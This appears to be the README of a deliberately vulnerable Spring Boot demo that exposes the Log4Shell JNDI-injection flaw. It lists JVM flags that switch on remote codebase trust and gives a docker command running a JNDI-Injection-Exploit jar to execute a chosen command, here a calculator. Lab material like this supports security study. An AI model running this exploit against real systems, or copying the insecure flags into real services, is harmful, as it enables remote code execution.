
# BAP log4j zero day

A spring boot service that exposes log4shell vulnerability (<https://en.wikipedia.org/wiki/Log4Shell>).

## Attacking

Start the server with _Java 8_ and the following properties set:

```
-Dcom.sun.jndi.ldap.object.trustURLCodebase=true
-Dcom.sun.jndi.rmi.object.trustURLCodebase=true
-Dcom.sun.jndi.cosnaming.object.trustURLCodebase=true
```

(This was the default for some prior releases - in the newest releases they default to `false`)

Run the `JNDI-Injection-Exploit` (you may use docker):

```sh
./mvnw package
docker run --rm -it \
  -v $(pwd)/target:/exploit \
  openjdk:8 \
  java \
    -jar /exploit/JNDI-Injection-Exploit-1.0-SNAPSHOT-all.jar \
    -C "/usr/bin/gnome-calculator"
```

It will display the URLs which can be used for injection. The requests are documented [here](./post.http).

(On Mac OS there is a sensible default for `-C` so you can skip it)
(You might need to publish some ports though on Mac OS/Windows)

## Endpoints

### `PUT /harmless`

Create a post (and it will log the post too...)

```sh
curl -X PUT \
     http://localhost:8080/harmless \
     -H 'Content-Type: application/json' \
     --data-binary '{"title": "t", "content": "c"}'
```
